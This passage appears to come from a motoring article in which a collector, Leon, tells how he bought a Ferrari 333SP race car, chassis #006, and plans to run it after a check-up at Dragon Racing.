“For me, it’s the biggest, most important one crossed off my list. As a kid I always loved these cars. I followed racing and when I saw this car in the ‘90s, I thought this is something I really want to own someday.
“I’d been looking for two, maybe three years. Actually, funnily enough I was bidding on a McLaren F1 GTR Longtail in America – and lost it for a lot of money – when this turned up on the market. It took two months to finalise everything and make sure this was a genuine car. In the end there wasn’t a lot of negotiation because I ended up paying the asking price!”
Unfortunately fans at the Autodrome didn’t get to see this particular example – chassis #006 – in action. But on knackered tyres and having only just fallen off the boat from North California, this decision is understandable. Once the 333SP has had a complete check-up by the guys at Dragon Racing, Leon is keen to see his new purchase in action as soon as possible.
“I want to get the car exposed. It’s been locked up for ten years. The last time it was out was at Sebring in 2003 for a historic race. So other than the odd track day, it’s been kept very private.
